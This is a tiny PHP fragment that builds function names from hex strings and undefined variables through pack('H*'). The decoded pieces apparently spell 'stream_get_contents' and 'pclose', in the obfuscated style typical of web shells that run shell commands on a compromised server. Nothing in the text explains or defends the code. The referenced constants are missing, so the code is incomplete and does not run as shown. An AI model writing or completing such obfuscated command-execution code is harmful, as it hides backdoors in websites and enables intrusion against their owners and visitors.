<?php 
 
$uconvert6 = pack("H*", $constant1 . $constant3 . '72' . '65' . $constant11 . '6d' . '5f' . '67' . $constant7 . $constant3 . $constant6 . $constant9 . '6f' . '6e' . $constant3 . $constant7 . $constant14 . '74' . $constant1);
$uconvert7 = pack("H*", '70' . '63' . $constant5 . $constant15 . '73' . $constant7);

